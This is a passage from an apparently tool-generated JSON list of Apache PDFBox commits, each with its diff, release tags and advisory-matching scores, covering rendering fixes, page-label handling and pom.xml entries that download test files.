-362,2 +366,12 @@ public class PDFRenderer", - " }", - "+", - "+ /**", - "+ * Returns the image to which the current page is being rendered.", - "+ * May be null if the page is rendered to a Graphics2D object", - "+ * instead of a BufferedImage.", - "+ */", - "+ BufferedImage getPageImage()", - "+ {", - "+ return pageImage;", - "+ }", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "index 7bb951943..09ebf0a01 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "@@ -46,4 +46,7 @@ import java.util.ArrayList;", - " import java.util.HashMap;", - "+import java.util.HashSet;", - " import java.util.List;", - " import java.util.Map;", - "+import java.util.Set;", - "+import java.util.Stack;", - " import org.apache.commons.logging.Log;", - "@@ -55,2 +58,3 @@ import org.apache.pdfbox.cos.COSDictionary;", - " import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.pdmodel.PDResources;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "@@ -60,2 +64,4 @@ import org.apache.pdfbox.pdmodel.font.PDVectorFont;", - " import org.apache.pdfbox.pdmodel.graphics.PDLineDashPattern;", - "+import org.apache.pdfbox.pdmodel.graphics.PDXObject;", - "+import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "@@ -71,2 +77,3 @@ import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", - " import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", - "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", - " import org.apache.pdfbox.pdmodel.graphics.state.PDGraphicsState;", - "@@ -129,2 +136,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - "+ private final Stack transparencyGroupStack = new Stack<>();", - "+", - " /**", - "@@ -1274,2 +1283,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " private final int minY;", - "+ private final int maxX;", - "+ private final int maxY;", - " private final int width;", - "@@ -1311,2 +1322,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " minY = 0;", - "+ maxX = 0;", - "+ maxY = 0;", - " width = 0;", - "@@ -1325,4 +1338,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " minY = (int) Math.floor(bounds.getMinY());", - "- int maxX = (int) Math.floor(bounds.getMaxX()) + 1;", - "- int maxY = (int) Math.floor(bounds.getMaxY()) + 1;", - "+ maxX = (int) Math.floor(bounds.getMaxX()) + 1;", - "+ maxY = (int) Math.floor(bounds.getMaxY()) + 1;", - "@@ -1340,3 +1353,36 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " }", - "+", - "+ boolean needsBackdrop = !isSoftMask && !form.getGroup().isIsolated() &&", - "+ hasBlendMode(form, new HashSet());", - "+ BufferedImage backdropImage = null;", - "+ // Position of this group in parent group's coordinates", - "+ int backdropX = 0;", - "+ int backdropY = 0;", - "+ if (needsBackdrop)", - "+ {", - "+ if (transparencyGroupStack.isEmpty())", - "+ {", - "+ // Use the current page as the parent group.", - "+ backdropImage = renderer.getPageImage();", - "+ needsBackdrop = backdropImage != null;", - "+ backdropX = minX;", - "+ backdropY = (backdropImage != null) ? (backdropImage.getHeight() - maxY) : 0;", - "+ }", - "+ else", - "+ {", - "+ TransparencyGroup parentGroup = transparencyGroupStack.peek();", - "+ backdropImage = parentGroup.image;", - "+ backdropX = minX - parentGroup.minX;", - "+ backdropY = parentGroup.maxY - maxY;", - "+ }", - "+ }", - "+", - " Graphics2D g = image.createGraphics();", - "+ if (needsBackdrop)", - "+ {", - "+ // backdropImage must be included in group image but not in group alpha.", - "+ g.drawImage(backdropImage, 0, 0, width, height,", - "+ backdropX, backdropY, backdropX + width, backdropY + height, null);", - "+ g = new GroupGraphics(image, g);", - "+ }", - " if (isSoftMask && backdropColor != null)", - "@@ -1388,3 +1434,8 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " {", - "+ transparencyGroupStack.push(this);", - " processTransparencyGroup(form);", - "+ if (!transparencyGroupStack.isEmpty())", - "+ {", - "+ transparencyGroupStack.pop();", - "+ }", - " }", - "@@ -1403,2 +1454,7 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " }", - "+", - "+ if (needsBackdrop)", - "+ {", - "+ ((GroupGraphics) g).removeBackdrop(backdropImage, backdropX, backdropY);", - "+ }", - " }", - "@@ -1478,2 +1534,52 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " }", - "+", - "+ private boolean hasBlendMode(PDTransparencyGroup group, Set groupsDone)", - "+ {", - "+ if (groupsDone.contains(group.getCOSObject()))", - "+ {", - "+ // The group was already processed. Avoid endless recursion.", - "+ return false;", - "+ }", - "+ groupsDone.add(group.getCOSObject());", - "+", - "+ PDResources resources = group.getResources();", - "+ if (resources == null)", - "+ {", - "+ return false;", - "+ }", - "+ for (COSName name : resources.getExtGStateNames())", - "+ {", - "+ PDExtendedGraphicsState extGState = resources.getExtGState(name);", - "+ if (extGState == null)", - "+ {", - "+ continue;", - "+ }", - "+ BlendMode blendMode = extGState.getBlendMode();", - "+ if (blendMode != BlendMode.NORMAL)", - "+ {", - "+ return true;", - "+ }", - "+ }", - "+", - "+ // Recursively process nested transparency groups", - "+ for (COSName name : resources.getXObjectNames())", - "+ {", - "+ PDXObject xObject;", - "+ try", - "+ {", - "+ xObject = resources.getXObject(name);", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ continue;", - "+ }", - "+ if (xObject instanceof PDTransparencyGroup &&", - "+ hasBlendMode((PDTransparencyGroup)xObject, groupsDone))", - "+ {", - "+ return true;", - "+ }", - "+ }", - "+", - "+ return false;", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3000": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "c5cc36811a34e99722f70426b107ace59a5f7c8e" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3000", - "relevance": 2 - } - ] - }, - { - "commit_id": "d02495dedb4c5984759662ede249afbb362166cb", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527421505, - "hunks": 1, - "message": "PDFBOX-4184: remote loading of test file 032163.jpg / http://www.crh.noaa.gov/Image/gjt/images/ImageGallery/Uncompahgre_small.jpg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832328 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index fa49e21ea..1d8bd38d8 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -408,2 +408,17 @@", - " ", - "+ ", - "+ PDFBOX-4184", - "+ generate-test-resources", - "+ ", - "+ wget", - "+ ", - "+ ", - "+ http://www.crh.noaa.gov/Image/gjt/images/ImageGallery/Uncompahgre_small.jpg", - "+ ", - "+ ${project.build.directory}/imgs", - "+ PDFBOX-4184-032163.jpg", - "+ 35241c979d3808ca9d2641b5ec5e40637132b313f75070faca8b8f6d00ddce394070414236db3993f1092fe3bc16995750d528b6d803a7851423c14c308ccdde", - "+ ", - "+ ", - " " - ], - "changed_files": [ - "pdfbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "db5f3c003fe96619591abbd3433b997149b9b97a" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "4c19d42c392e0d536a2a138b93d99d323c596290", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526586017, - "hunks": 1, - "message": "PDFBOX-4222: skip bad page label entry git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831804 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 27ae233e4..59e07ffa8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -611,3 +611,9 @@ public class PDFMergerUtility", - " {", - "- COSNumber labelIndex = (COSNumber) srcNums.getObject(i);", - "+ COSBase base = srcNums.getObject(i);", - "+ if (!(base instanceof COSNumber))", - "+ {", - "+ LOG.warn(\"page labels skipped at index \" + i + \", should be a number, but is \" + base);", - "+ break;", - "+ }", - "+ COSNumber labelIndex = (COSNumber) base;", - " long labelIndexValue = labelIndex.intValue();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4222": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "579a4335f38308336dcb1615d2933871f299a5c3" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4222", - "relevance": 2 - } - ] - }, - { - "commit_id": "80726dc0fafc848ae496a25e37e1f4ad9fe3605b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530475029, - "hunks": 1, - "message": "PDFBOX-4184: add remote loading of 16 bit ARGB test file git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834803 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 9e8b2e034..ba4f2b4a7 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -422,2 +422,21 @@", - " ", - "+ ", - "+ PDFBOX-4184-2", - "+ generate-test-resources", - "+ ", - "+ wget", - "+ ", - "+ ", - "+ https://issues.apache.org/jira/secure/attachment/12929821/16bit.png", - "+ ", - "+ ${project.build.directory}/imgs", - "+ PDFBOX-4184-16bit.png", - "+ 45f148913590ea1a94c3ac17080969b74e579fe51967a5bf535caa3f7104ea81ee222b99deb8ee528b0a53640f97d87cf668633a1bdd61a62092246df1807471", - "+ ", - "+ ", - " " - ], - "changed_files": [ - "pdfbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "3ab0c52abcdabb34e77cb80655a630cc28957096" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "87fdaa9fc2ac7856b0dffa4634e120c3174733a9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529524811, - "hunks": 1, - "message": "PDFBOX-4248: avoid NPE which can happen with a Batik graphics object git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833946 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "index c35848a66..0c29295fa 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "@@ -1245,3 +1245,8 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " // Example for NoZoom can be found in p5 of PDFBOX-2348", - "- int deviceType = graphics.getDeviceConfiguration().getDevice().getType();", - "+ int deviceType = -1;", - "+ if (graphics.getDeviceConfiguration() != null && ", - "+ graphics.getDeviceConfiguration().getDevice() != null)", - "+ {", - "+ deviceType = graphics.getDeviceConfiguration().getDevice().getType();", - "+ }", - " if (deviceType == GraphicsDevice.TYPE_PRINTER && !annotation.isPrinted())" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4248": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "48bc5e90b987d43eb28536a6956d387f9f9d723b" - ] - ], - "tags": [ - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4248", - "relevance": 2 - } - ] - }, - { - "commit_id": "1cd8c52437689c60b10241675343c5624f8a27f6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526588954, - "hunks": 2, - "message": "PDFBOX-4222: ignore all page labels if there is a bad entry (similar to Adobe Reader) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831811 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 3634fbeaf..5f613e3a4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -621,2 +621,3 @@ public class PDFMergerUtility", - " {", - "+ int startSize = destNums.size();", - " for (int i = 0; i < srcNums.size(); i += 2)", - "@@ -626,3 +627,8 @@ public class PDFMergerUtility", - " {", - "- LOG.warn(\"page labels skipped at index \" + i + \", should be a number, but is \" + base);", - "+ LOG.error(\"page labels ignored, index \" + i + \" should be a number, but is \" + base);", - "+ // remove what we added", - "+ while (destNums.size() > startSize)", - "+ {", - "+ destNums.remove(startSize);", - "+ }", - " break;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4222": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a0eec9d373afe4d8f52886923ffe15929bdb0e7f" - ], - [ - "no-tag", - "e1ab9f22ad27ffd482637d7b0788ac3a9264ddd6" - ], - [ - "no-tag", - "9a3b2af822f855ab299dbc6415052ab559fbf40e" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4222", - "relevance": 2 - } - ] - }, - { - "commit_id": "bb8d553c042e48c3fba7315f86917bd068d9bef0", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524906205, - "hunks": 3, - "message": "PDFBOX-4207: apply default transform to mouse coordinates git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830415 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "index 80f540d65..4945ec465 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "@@ -71,2 +71,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " private final Map rectMap = new HashMap();", - "+ private final AffineTransform defaultTransform = GraphicsEnvironment.getLocalGraphicsEnvironment().", - "+ getDefaultScreenDevice().getDefaultConfiguration().getDefaultTransform();", - "@@ -216,4 +218,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " float zoomScale = zoomMenu.getPageZoomScale();", - "- float x = e.getX() / zoomScale;", - "- float y = e.getY() / zoomScale;", - "+ float x = e.getX() / zoomScale * (float) defaultTransform.getScaleX();", - "+ float y = e.getY() / zoomScale * (float) defaultTransform.getScaleY();", - " int x1, y1;", - "@@ -325,6 +327,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " // See PDFBOX-3665 for more sample code and discussion.", - "- AffineTransform tx = GraphicsEnvironment.getLocalGraphicsEnvironment().", - "- getDefaultScreenDevice().getDefaultConfiguration().getDefaultTransform();", - "- label.setSize((int) Math.ceil(image.getWidth() / tx.getScaleX()), ", - "- (int) Math.ceil(image.getHeight() / tx.getScaleY()));", - "+ label.setSize((int) Math.ceil(image.getWidth() / defaultTransform.getScaleX()), ", - "+ (int) Math.ceil(image.getHeight() / defaultTransform.getScaleY()));", - " label.setIcon(new HighResolutionImageIcon(image, label.getWidth(), label.getHeight()));" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4207": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "bb0ef8d3c645ffaf9b8bc37f4e44314a3ec42eae" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4207", - "relevance": 2 - } - ] - }, - { - "commit_id": "761812d62258990706048dd55d06ded4d2ac5ef5", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524160171, - "hunks": 1, - "message": "PDFBOX-4197: load test file into repository git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829583 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 04e597c5c..fa49e21ea 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -395,2 +395,15 @@", - " ", - "+ ", - "+ PDFBOX-4197", - "+ generate-test-resources", - "+ ", - "+ wget", - "+ ", - "+ ", - "+ https://issues.apache.org/jira/secure/attachment/12919726/sample.pdf", - "+ ${project.build.directory}/pdfs", - "+ PDFBOX-4197.pdf", - "+ 6fefc869dff9db8cd539db177d35beeacc62304173245742eaee8882dab330860a31cbbd4c4ec6cc724603cc453afc07ec61361fbc1e80a47f44b04ccfbaf40d", - "+ ", - "+ ", - " " - ], - "changed_files": [ - "pdfbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4197": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "4a8dc72196312c2b3cd3989946ab226568f52089" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4197", - "relevance": 2 - } - ] - }, - { - "commit_id": "d41ed6df8a80be126aeb3a186ec184b97b406502", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523986405, - "hunks": 3, - "message": "PDFBOX-2941: trigger another premature initialization for more accurate rendering benchmarks git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829377 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "index bc8258239..c59fb8880 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "@@ -108,2 +108,3 @@ import org.apache.pdfbox.debugger.ui.Tree;", - " import org.apache.pdfbox.debugger.ui.ZoomMenu;", - "+import org.apache.pdfbox.filter.FilterFactory;", - " import org.apache.pdfbox.io.IOUtils;", - "@@ -112,3 +113,2 @@ import org.apache.pdfbox.pdmodel.common.PDPageLabels;", - " import org.apache.pdfbox.pdmodel.encryption.InvalidPasswordException;", - "-import org.apache.pdfbox.pdmodel.font.PDFont;", - " import org.apache.pdfbox.pdmodel.font.PDType1Font;", - "@@ -1206,2 +1206,3 @@ public class PDFDebugger extends JFrame", - " IIORegistry.getDefaultInstance();", - "+ FilterFactory.INSTANCE.getFilter(COSName.FLATE_DECODE);", - " }" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1111b63e45417eda967afb9eec1d56c02ede3178" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: trigger", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "a6b2cf98e431f0815251d2e41a1e61a5e7d5e110", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529331713, - "hunks": 1, - "message": "PDFBOX-4245: revert because of regression git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833726 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "index 7b16f95fa..8b0a25235 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "@@ -1468,5 +1468,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " // Flip y", - "- // PDFBOX-4245 also consider translation in xform", - "- return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX() + xform.getTranslateX(),", - "- size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY() + xform.getTranslateY(),", - "+ return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX(),", - "+ size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY(),", - " width, height);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4245": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "929992440df88dcd87bb4b2c605441987f717abd" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4245", - "relevance": 2 - } - ] - }, - { - "commit_id": "fab9c770b55f000effebf5c94d8a1f3d7025261a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525957435, - "hunks": 2, - "message": "PDFBOX-4071: refactor the code in order to not assign to this loop counter from within the loop body git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831337 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index 2fa470561..f9998e197 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ 